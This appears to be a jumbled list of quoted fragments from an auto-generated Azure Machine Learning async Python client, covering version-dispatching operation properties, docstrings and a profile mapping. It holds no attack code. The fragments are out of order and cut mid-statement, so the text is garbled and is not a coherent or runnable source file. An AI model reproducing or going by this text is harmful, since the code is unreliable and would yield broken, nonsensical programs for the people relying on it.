'metric'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def migration(self): \"\"\"Instance depends", "Changes may cause incorrect behavior and will be lost if the code is", "version {} does not have operation group 'dataset_versions'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version)))", "* 2022-02-01-preview: :class:`OnlineEndpointsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.OnlineEndpointsOperations>` * 2022-05-01: :class:`OnlineEndpointsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.OnlineEndpointsOperations>` \"\"\" api_version = self._get_api_version('online_endpoints') if api_version ==", "GetOperationStatusOperations as OperationClass else: raise ValueError(\"API version {} does not have operation group", "OperationClass elif api_version == '2022-01-01-preview': from ..v2022_01_01_preview.aio.operations import QuotasOperations as OperationClass elif api_version", "api_version == '2022-05-01': from ..v2022_05_01.aio.operations import UsagesOperations as OperationClass else: raise ValueError(\"API version", "import MigrationOperations as OperationClass else: raise ValueError(\"API version {} does not have operation", "* 2022-01-01-preview: :class:`UsagesOperations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.UsagesOperations>` * 2022-05-01: :class:`UsagesOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.UsagesOperations>` \"\"\" api_version = self._get_api_version('usages') if api_version ==", "api_version == '2021-10-01': from ..v2021_10_01.aio.operations import QuotasOperations as OperationClass elif api_version == '2022-01-01-preview':", "version {} does not have operation group 'spans'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version)))", "api_version = self._get_api_version('operations') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import Operations as OperationClass", "models return models raise ValueError(\"API version {} is not available\".format(api_version)) @property def assets(self):", "\"\"\"Instance depends on the API version: * 2021-10-01: :class:`CodeVersionsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.CodeVersionsOperations>` * 2021-10-01-dataplanepreview: :class:`CodeVersionsOperations<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.aio.operations.CodeVersionsOperations>` *", "on the API version: * 2021-10-01: :class:`PrivateEndpointConnectionsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.PrivateEndpointConnectionsOperations>` * 2022-01-01-preview: :class:`PrivateEndpointConnectionsOperations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.PrivateEndpointConnectionsOperations>` * 2022-05-01: :class:`PrivateEndpointConnectionsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.PrivateEndpointConnectionsOperations>`", "* 2022-05-01: :class:`BatchDeploymentsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.BatchDeploymentsOperations>` \"\"\" api_version = self._get_api_version('batch_deployments') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations", "{} does not have operation group 'code_versions'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property", "\"\"\"Instance depends on the API version: * 2021-10-01: :class:`BatchEndpointsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.BatchEndpointsOperations>` * 2022-02-01-preview: :class:`BatchEndpointsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.BatchEndpointsOperations>` *", "from ..runhistory.aio.operations import MetricOperations as OperationClass else: raise ValueError(\"API version {} does not", "self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def component_versions(self): \"\"\"Instance depends on the API version: *", "OperationClass else: raise ValueError(\"API version {} does not have operation group 'get_operation_status'\".format(api_version)) return", "OperationClass else: raise ValueError(\"API version {} does not have operation group 'batch_job_deployment'\".format(api_version)) return", "* v1.0: :class:`EventsOperations<azure.mgmt.machinelearningservices.runhistory.aio.operations.EventsOperations>` \"\"\" api_version = self._get_api_version('events') if api_version == 'v1.0': from ..runhistory.aio.operations", "import SpansOperations as OperationClass else: raise ValueError(\"API version {} does not have operation", "self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) async def close(self): await self._client.close() async def __aenter__(self): await self._client.__aenter__()", "have operation group 'spans'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def temporary_data_references(self): \"\"\"Instance", "== '2022-05-01': from ..v2022_05_01.aio.operations import WorkspaceConnectionsOperations as OperationClass else: raise ValueError(\"API version {}", "API version: * 1.5.0: :class:`DataVersionOperations<azure.mgmt.machinelearningservices.dataset_dataplane.aio.operations.DataVersionOperations>` \"\"\" api_version = self._get_api_version('data_version') if api_version == '1.5.0':", "CodeContainersOperations as OperationClass else: raise ValueError(\"API version {} does not have operation group", "'2021-10-01-dataplanepreview': from ..v2021_10_01_dataplanepreview.aio.operations import ComponentContainersOperations as OperationClass elif api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations", "elif api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import DatastoresOperations as OperationClass elif api_version ==", "* 1.5.0: :class:`DeleteOperations<azure.mgmt.machinelearningservices.dataset_dataplane.aio.operations.DeleteOperations>` * v1.0: :class:`DeleteOperations<azure.mgmt.machinelearningservices.runhistory.aio.operations.DeleteOperations>` \"\"\" api_version = self._get_api_version('delete') if api_version ==", "from ..v2022_02_01_preview import models return models elif api_version == '2022-05-01': from ..v2022_05_01 import", "does not have operation group 'registry_management_non_workspace'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def", "raise ValueError(\"API version {} does not have operation group 'batch_endpoints'\".format(api_version)) return OperationClass(self._client, self._config,", "self._get_api_version('data_container') if api_version == '1.5.0': from ..dataset_dataplane.aio.operations import DataContainerOperations as OperationClass else: raise", "== '2022-05-01': from ..v2022_05_01.aio.operations import EnvironmentVersionsOperations as OperationClass else: raise ValueError(\"API version {}", "on the API version: * v1.0: :class:`EventsOperations<azure.mgmt.machinelearningservices.runhistory.aio.operations.EventsOperations>` \"\"\" api_version = self._get_api_version('events') if api_version", "from ..v2021_10_01.aio.operations import CodeVersionsOperations as OperationClass elif api_version == '2021-10-01-dataplanepreview': from ..v2021_10_01_dataplanepreview.aio.operations import", "depends on the API version: * 2021-10-01: :class:`JobsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.JobsOperations>` * 2022-02-01-preview: :class:`JobsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.JobsOperations>` * 2022-05-01:", "== '2021-10-01': from ..v2021_10_01.aio.operations import EnvironmentContainersOperations as OperationClass elif api_version == '2021-10-01-dataplanepreview': from", "version {} does not have operation group 'datastores'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version)))", "* 2021-10-01: :class:`BatchEndpointsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.BatchEndpointsOperations>` * 2022-02-01-preview: :class:`BatchEndpointsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.BatchEndpointsOperations>` * 2022-05-01: :class:`BatchEndpointsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.BatchEndpointsOperations>` \"\"\" api_version = self._get_api_version('batch_endpoints')", "from ..v2022_05_01.aio.operations import PrivateEndpointConnectionsOperations as OperationClass else: raise ValueError(\"API version {} does not", "else: raise ValueError(\"API version {} does not have operation group 'extensive_model'\".format(api_version)) return OperationClass(self._client,", "if api_version == '1.5.0': from ..dataset_dataplane.aio.operations import DataVersionOperations as OperationClass else: raise ValueError(\"API", "OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def online_endpoints(self): \"\"\"Instance depends on the API version:", "'run'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def run_artifacts(self): \"\"\"Instance depends on the", "'code_versions'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def component_containers(self): \"\"\"Instance depends on the", "= self._get_api_version('run_artifacts') if api_version == 'v1.0': from ..runhistory.aio.operations import RunArtifactsOperations as OperationClass else:", "== 'v1.0': from ..runhistory.aio.operations import RunArtifactsOperations as OperationClass else: raise ValueError(\"API version {}", "Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def events(self): \"\"\"Instance depends on the API version: * v1.0:", "..v2022_05_01.aio.operations import OnlineEndpointsOperations as OperationClass else: raise ValueError(\"API version {} does not have", "@property def environment_versions(self): \"\"\"Instance depends on the API version: * 2021-10-01: :class:`EnvironmentVersionsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.EnvironmentVersionsOperations>` *", "models elif api_version == '2022-02-01-preview': from ..v2022_02_01_preview import models return models elif api_version", "api_version == '2022-05-01': from ..v2022_05_01.aio.operations import EnvironmentContainersOperations as OperationClass else: raise ValueError(\"API version", "2022-05-01: :class:`WorkspacesOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.WorkspacesOperations>` \"\"\" api_version = self._get_api_version('workspaces') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import", "'2022-01-01-preview': from ..v2022_01_01_preview import models return models elif api_version == '2022-02-01-preview': from ..v2022_02_01_preview", "= self._get_api_version('usages') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import UsagesOperations as OperationClass elif", "self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def spans(self): \"\"\"Instance depends on the API version: *", "BatchDeploymentsOperations as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import BatchDeploymentsOperations as OperationClass", "'2021-10-01': from ..v2021_10_01.aio.operations import WorkspaceFeaturesOperations as OperationClass elif api_version == '2022-01-01-preview': from ..v2022_01_01_preview.aio.operations", "'runs'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def spans(self): \"\"\"Instance depends on the", "from ..v2022_05_01.aio.operations import QuotasOperations as OperationClass else: raise ValueError(\"API version {} does not", "as OperationClass else: raise ValueError(\"API version {} does not have operation group 'async_operations'\".format(api_version))", "does not have operation group 'events'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def", "import EnvironmentVersionsOperations as OperationClass elif api_version == '2021-10-01-dataplanepreview': from ..v2021_10_01_dataplanepreview.aio.operations import EnvironmentVersionsOperations as", "'2021-10-01': from ..v2021_10_01.aio.operations import ComponentContainersOperations as OperationClass elif api_version == '2021-10-01-dataplanepreview': from ..v2021_10_01_dataplanepreview.aio.operations", "2022-01-01-preview: :class:`PrivateLinkResourcesOperations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.PrivateLinkResourcesOperations>` * 2022-05-01: :class:`PrivateLinkResourcesOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.PrivateLinkResourcesOperations>` \"\"\" api_version = self._get_api_version('private_link_resources') if api_version == '2021-10-01':", "raise ValueError(\"API version {} does not have operation group 'get_operation_status'\".format(api_version)) return OperationClass(self._client, self._config,", "__init__( self, credential: \"AsyncTokenCredential\", subscription_id: str, api_version: Optional[str] = None, base_url: str =", "* 2021-10-01: :class:`ComponentVersionsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.ComponentVersionsOperations>` * 2021-10-01-dataplanepreview: :class:`ComponentVersionsOperations<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.aio.operations.ComponentVersionsOperations>` * 2022-02-01-preview: :class:`ComponentVersionsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.ComponentVersionsOperations>` * 2022-05-01: :class:`ComponentVersionsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.ComponentVersionsOperations>` \"\"\"", "from ..v2022_05_01.aio.operations import WorkspacesOperations as OperationClass else: raise ValueError(\"API version {} does not", "..v2022_02_01_preview.aio.operations import BatchDeploymentsOperations as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import BatchDeploymentsOperations", "OperationClass elif api_version == '2021-10-01-dataplanepreview': from ..v2021_10_01_dataplanepreview.aio.operations import CodeVersionsOperations as OperationClass elif api_version", "* 2021-10-01: :class:`ModelVersionsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.ModelVersionsOperations>` * 2021-10-01-dataplanepreview: :class:`ModelVersionsOperations<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.aio.operations.ModelVersionsOperations>` * 2022-02-01-preview: :class:`ModelVersionsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.ModelVersionsOperations>` * 2022-05-01: :class:`ModelVersionsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.ModelVersionsOperations>` \"\"\"", "elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import CodeVersionsOperations as OperationClass else: raise ValueError(\"API", "def extensive_model(self): \"\"\"Instance depends on the API version: * 1.0.0: :class:`ExtensiveModelOperations<azure.mgmt.machinelearningservices.model_dataplane.aio.operations.ExtensiveModelOperations>` \"\"\" api_version", "..v2021_10_01.aio.operations import ComponentVersionsOperations as OperationClass elif api_version == '2021-10-01-dataplanepreview': from ..v2021_10_01_dataplanepreview.aio.operations import ComponentVersionsOperations", "not have operation group 'data_containers'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def data_version(self):", "version: * 1.0.0: :class:`ExtensiveModelOperations<azure.mgmt.machinelearningservices.model_dataplane.aio.operations.ExtensiveModelOperations>` \"\"\" api_version = self._get_api_version('extensive_model') if api_version == '1.0.0': from", "api_version = self._get_api_version('jobs') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import JobsOperations as OperationClass", "-------------------------------------------------------------------------- from typing import Any, Optional, TYPE_CHECKING from azure.mgmt.core import AsyncARMPipelineClient from azure.profiles", "v1.0: :mod:`registry_discovery.models<azure.mgmt.machinelearningservices.registry_discovery.models>` * v1.0: :mod:`runhistory.models<azure.mgmt.machinelearningservices.runhistory.models>` * 2020-09-01-dataplanepreview: :mod:`v2020_09_01_dataplanepreview.models<azure.mgmt.machinelearningservices.v2020_09_01_dataplanepreview.models>` * 2021-10-01: :mod:`v2021_10_01.models<azure.mgmt.machinelearningservices.v2021_10_01.models>` * 2021-10-01-dataplanepreview:", "the API version: * 1.0.0: :class:`ModelsOperations<azure.mgmt.machinelearningservices.model_dataplane.aio.operations.ModelsOperations>` \"\"\" api_version = self._get_api_version('models') if api_version ==", "\"\"\"Instance depends on the API version: * 2020-09-01-dataplanepreview: :class:`BatchJobEndpointOperations<azure.mgmt.machinelearningservices.v2020_09_01_dataplanepreview.aio.operations.BatchJobEndpointOperations>` \"\"\" api_version = self._get_api_version('batch_job_endpoint')", "..v2022_02_01_preview.aio.operations import ComponentVersionsOperations as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import ComponentVersionsOperations", "depends on the API version: * 2021-10-01: :class:`DatasetContainersOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.DatasetContainersOperations>` \"\"\" api_version = self._get_api_version('dataset_containers') if", "= self._get_api_version('data_container') if api_version == '1.5.0': from ..dataset_dataplane.aio.operations import DataContainerOperations as OperationClass else:", "Deserializer(self._models_dict(api_version))) @property def dataset_v2(self): \"\"\"Instance depends on the API version: * 1.5.0: :class:`DatasetV2Operations<azure.mgmt.machinelearningservices.dataset_dataplane.aio.operations.DatasetV2Operations>`", "'2021-10-01': from ..v2021_10_01.aio.operations import PrivateEndpointConnectionsOperations as OperationClass elif api_version == '2022-01-01-preview': from ..v2022_01_01_preview.aio.operations", "as OperationClass else: raise ValueError(\"API version {} does not have operation group 'private_endpoint_connections'\".format(api_version))", "== '2021-10-01': from ..v2021_10_01.aio.operations import DatasetContainersOperations as OperationClass else: raise ValueError(\"API version {}", "group 'model_containers'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def model_versions(self): \"\"\"Instance depends on", "EnvironmentContainersOperations as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import EnvironmentContainersOperations as OperationClass", "api_version = self._get_api_version('dataset_v2') if api_version == '1.5.0': from ..dataset_dataplane.aio.operations import DatasetV2Operations as OperationClass", "from ..dataset_dataplane.aio.operations import DatasetsV1Operations as OperationClass else: raise ValueError(\"API version {} does not", "from ..dataset_dataplane.aio.operations import DataVersionOperations as OperationClass else: raise ValueError(\"API version {} does not", "registry_management_non_workspace(self): \"\"\"Instance depends on the API version: * v1.0: :class:`RegistryManagementNonWorkspaceOperations<azure.mgmt.machinelearningservices.registry_discovery.aio.operations.RegistryManagementNonWorkspaceOperations>` \"\"\" api_version =", "the API version: * 2020-09-01-dataplanepreview: :class:`BatchJobDeploymentOperations<azure.mgmt.machinelearningservices.v2020_09_01_dataplanepreview.aio.operations.BatchJobDeploymentOperations>` \"\"\" api_version = self._get_api_version('batch_job_deployment') if api_version ==", "api_version == '2022-05-01': from ..v2022_05_01.aio.operations import DataContainersOperations as OperationClass else: raise ValueError(\"API version", "OperationClass else: raise ValueError(\"API version {} does not have operation group 'data_container'\".format(api_version)) return", "'data_container': '1.5.0', 'data_version': '1.5.0', 'dataset_containers': '2021-10-01', 'dataset_controller_v2': '1.5.0', 'dataset_v2': '1.5.0', 'dataset_versions': '2021-10-01', 'datasets_v1':", "DataCallOperations as OperationClass else: raise ValueError(\"API version {} does not have operation group", "api_version == 'v1.0': from ..runhistory.aio.operations import RunsOperations as OperationClass else: raise ValueError(\"API version", "@property def workspaces(self): \"\"\"Instance depends on the API version: * 2021-10-01: :class:`WorkspacesOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.WorkspacesOperations>` *", "api_version = self._get_api_version('model_containers') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import ModelContainersOperations as OperationClass", "..v2021_10_01.aio.operations import Operations as OperationClass elif api_version == '2022-01-01-preview': from ..v2022_01_01_preview.aio.operations import Operations", "OperationClass elif api_version == 'v1.0': from ..runhistory.aio.operations import DeleteOperations as OperationClass else: raise", "Retry-After header is present. \"\"\" DEFAULT_API_VERSION = '2022-05-01' _PROFILE_TAG = \"azure.mgmt.machinelearningservices.AzureMachineLearningWorkspaces\" LATEST_PROFILE =", "\"\"\"Instance depends on the API version: * v1.0: :class:`RunOperations<azure.mgmt.machinelearningservices.runhistory.aio.operations.RunOperations>` \"\"\" api_version = self._get_api_version('run')", "* 2022-02-01-preview: :class:`DatastoresOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.DatastoresOperations>` * 2022-05-01: :class:`DatastoresOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.DatastoresOperations>` \"\"\" api_version = self._get_api_version('datastores') if api_version ==", "have operation group 'environment_containers'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def environment_versions(self): \"\"\"Instance", "== '2021-10-01-dataplanepreview': from ..v2021_10_01_dataplanepreview.aio.operations import CodeVersionsOperations as OperationClass elif api_version == '2022-02-01-preview': from", "OperationClass elif api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import ComponentVersionsOperations as OperationClass elif api_version", "'1.5.0', 'dataset_versions': '2021-10-01', 'datasets_v1': '1.5.0', 'delete': 'v1.0', 'events': 'v1.0', 'experiments': 'v1.0', 'extensive_model': '1.0.0',", "'v1.0': from ..runhistory.aio.operations import SpansOperations as OperationClass else: raise ValueError(\"API version {} does", "rights reserved. # Licensed under the MIT License. See License.txt in the project", "import ComponentContainersOperations as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import ComponentContainersOperations as", "if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import VirtualMachineSizesOperations as OperationClass elif api_version ==", "import ExtensiveModelOperations as OperationClass else: raise ValueError(\"API version {} does not have operation", "connect to Azure. :type credential: ~azure.core.credentials_async.AsyncTokenCredential :param subscription_id: The ID of the target", "OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def workspace_features(self): \"\"\"Instance depends on the API version:", "\"\"\"Instance depends on the API version: * 2021-10-01: :class:`CodeContainersOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.CodeContainersOperations>` * 2021-10-01-dataplanepreview: :class:`CodeContainersOperations<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.aio.operations.CodeContainersOperations>` *", "operation group 'data_container'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def data_containers(self): \"\"\"Instance depends", "'batch_endpoints'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def batch_job_deployment(self): \"\"\"Instance depends on the", "have operation group 'model_containers'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def model_versions(self): \"\"\"Instance", "api_version == '2021-10-01': from ..v2021_10_01.aio.operations import OnlineEndpointsOperations as OperationClass elif api_version == '2022-02-01-preview':", "as OperationClass else: raise ValueError(\"API version {} does not have operation group 'batch_deployments'\".format(api_version))", "..v2021_10_01_dataplanepreview.aio.operations import EnvironmentContainersOperations as OperationClass elif api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import EnvironmentContainersOperations", "api_version = self._get_api_version('component_versions') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import ComponentVersionsOperations as OperationClass", "'2022-05-01': from ..v2022_05_01.aio.operations import PrivateEndpointConnectionsOperations as OperationClass else: raise ValueError(\"API version {} does", ":mod:`v2021_10_01.models<azure.mgmt.machinelearningservices.v2021_10_01.models>` * 2021-10-01-dataplanepreview: :mod:`v2021_10_01_dataplanepreview.models<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.models>` * 2022-01-01-preview: :mod:`v2022_01_01_preview.models<azure.mgmt.machinelearningservices.v2022_01_01_preview.models>` * 2022-02-01-preview: :mod:`v2022_02_01_preview.models<azure.mgmt.machinelearningservices.v2022_02_01_preview.models>` * 2022-05-01: :mod:`v2022_05_01.models<azure.mgmt.machinelearningservices.v2022_05_01.models>`", "if api_version == '2020-09-01-dataplanepreview': from ..v2020_09_01_dataplanepreview.aio.operations import BatchJobDeploymentOperations as OperationClass else: raise ValueError(\"API", "== '2022-05-01': from ..v2022_05_01.aio.operations import ComputeOperations as OperationClass else: raise ValueError(\"API version {}", "elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import ModelVersionsOperations as OperationClass else: raise ValueError(\"API", "depends on the API version: * 2021-10-01: :class:`CodeVersionsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.CodeVersionsOperations>` * 2021-10-01-dataplanepreview: :class:`CodeVersionsOperations<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.aio.operations.CodeVersionsOperations>` * 2022-02-01-preview:", "OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def delete(self): \"\"\"Instance depends on the API version:", "no profile is provided, or if missing in profile. :type api_version: str :param", "== '2022-05-01': from ..v2022_05_01.aio.operations import PrivateLinkResourcesOperations as OperationClass else: raise ValueError(\"API version {}", "* v1.0: :class:`SpansOperations<azure.mgmt.machinelearningservices.runhistory.aio.operations.SpansOperations>` \"\"\" api_version = self._get_api_version('spans') if api_version == 'v1.0': from ..runhistory.aio.operations", "Deserializer(self._models_dict(api_version))) @property def temporary_data_references(self): \"\"\"Instance depends on the API version: * 2021-10-01-dataplanepreview: :class:`TemporaryDataReferencesOperations<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.aio.operations.TemporaryDataReferencesOperations>`", ":class:`OnlineDeploymentsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.OnlineDeploymentsOperations>` * 2022-05-01: :class:`OnlineDeploymentsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.OnlineDeploymentsOperations>` \"\"\" api_version = self._get_api_version('online_deployments') if api_version == '2021-10-01': from", "raise ValueError(\"API version {} does not have operation group 'data_version'\".format(api_version)) return OperationClass(self._client, self._config,", "api_version == '2022-05-01': from ..v2022_05_01.aio.operations import CodeContainersOperations as OperationClass else: raise ValueError(\"API version", "self._get_api_version('jobs') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import JobsOperations as OperationClass elif api_version", "group 'quotas'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def registry_management_non_workspace(self): \"\"\"Instance depends on", "'v1.0', 'run': 'v1.0', 'run_artifacts': 'v1.0', 'runs': 'v1.0', 'spans': 'v1.0', 'temporary_data_references': '2021-10-01-dataplanepreview', }}, _PROFILE_TAG", "ValueError(\"API version {} does not have operation group 'jobs'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)),", "str = \"https://management.azure.com\", profile: KnownProfiles = KnownProfiles.default, **kwargs # type: Any ) ->", "from ..runhistory.aio.operations import ExperimentsOperations as OperationClass else: raise ValueError(\"API version {} does not", "== '2021-10-01': from ..v2021_10_01.aio.operations import ModelContainersOperations as OperationClass elif api_version == '2021-10-01-dataplanepreview': from", ":class:`WorkspaceFeaturesOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.WorkspaceFeaturesOperations>` \"\"\" api_version = self._get_api_version('workspace_features') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import WorkspaceFeaturesOperations", "== 'v1.0': from ..runhistory.aio.operations import MetricOperations as OperationClass else: raise ValueError(\"API version {}", "..v2022_02_01_preview.aio.operations import ComponentContainersOperations as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import ComponentContainersOperations", "'v1.0': from ..runhistory.aio.operations import RunsOperations as OperationClass else: raise ValueError(\"API version {} does", "operation group 'batch_job_endpoint'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def code_containers(self): \"\"\"Instance depends", "OnlineEndpointsOperations as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import OnlineEndpointsOperations as OperationClass", "'2022-05-01' _PROFILE_TAG = \"azure.mgmt.machinelearningservices.AzureMachineLearningWorkspaces\" LATEST_PROFILE = ProfileDefinition({ _PROFILE_TAG: { None: DEFAULT_API_VERSION, 'assets': '1.0.0',", "ProfileDefinition({ _PROFILE_TAG: { None: DEFAULT_API_VERSION, 'assets': '1.0.0', 'async_operations': 'v1.0', 'batch_job_deployment': '2020-09-01-dataplanepreview', 'batch_job_endpoint': '2020-09-01-dataplanepreview',", ":class:`UsagesOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.UsagesOperations>` * 2022-01-01-preview: :class:`UsagesOperations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.UsagesOperations>` * 2022-05-01: :class:`UsagesOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.UsagesOperations>` \"\"\" api_version = self._get_api_version('usages') if api_version", "import ExperimentsOperations as OperationClass else: raise ValueError(\"API version {} does not have operation", "from ..v2020_09_01_dataplanepreview import models return models elif api_version == '2021-10-01': from ..v2021_10_01 import", "\"\"\" api_version = self._get_api_version('datastores') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import DatastoresOperations as", "Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def environment_versions(self): \"\"\"Instance depends on the API version: * 2021-10-01:", "azure.core.credentials import TokenCredential from azure.core.credentials_async import AsyncTokenCredential class _SDKClient(object): def __init__(self, *args, **kwargs):", "models return models elif api_version == 'v1.0': from ..registry_discovery import models return models", "depends on the API version: * 1.5.0: :class:`DataCallOperations<azure.mgmt.machinelearningservices.dataset_dataplane.aio.operations.DataCallOperations>` \"\"\" api_version = self._get_api_version('data_call') if", "as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import OnlineDeploymentsOperations as OperationClass else:", "OperationClass elif api_version == '2022-01-01-preview': from ..v2022_01_01_preview.aio.operations import Operations as OperationClass elif api_version", "..v2021_10_01.aio.operations import EnvironmentContainersOperations as OperationClass elif api_version == '2021-10-01-dataplanepreview': from ..v2021_10_01_dataplanepreview.aio.operations import EnvironmentContainersOperations", "for the client to connect to Azure. :type credential: ~azure.core.credentials_async.AsyncTokenCredential :param subscription_id: The", "from ..model_dataplane.aio.operations import MigrationOperations as OperationClass else: raise ValueError(\"API version {} does not", "\"\"\" api_version = self._get_api_version('quotas') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import QuotasOperations as", "\"\"\" api_version = self._get_api_version('async_operations') if api_version == 'v1.0': from ..registry_discovery.aio.operations import AsyncOperationsOperations as", "version: * 2020-09-01-dataplanepreview: :class:`BatchJobEndpointOperations<azure.mgmt.machinelearningservices.v2020_09_01_dataplanepreview.aio.operations.BatchJobEndpointOperations>` \"\"\" api_version = self._get_api_version('batch_job_endpoint') if api_version == '2020-09-01-dataplanepreview': from", "have operation group 'workspaces'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) async def close(self): await", "2022-05-01: :class:`CodeContainersOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.CodeContainersOperations>` \"\"\" 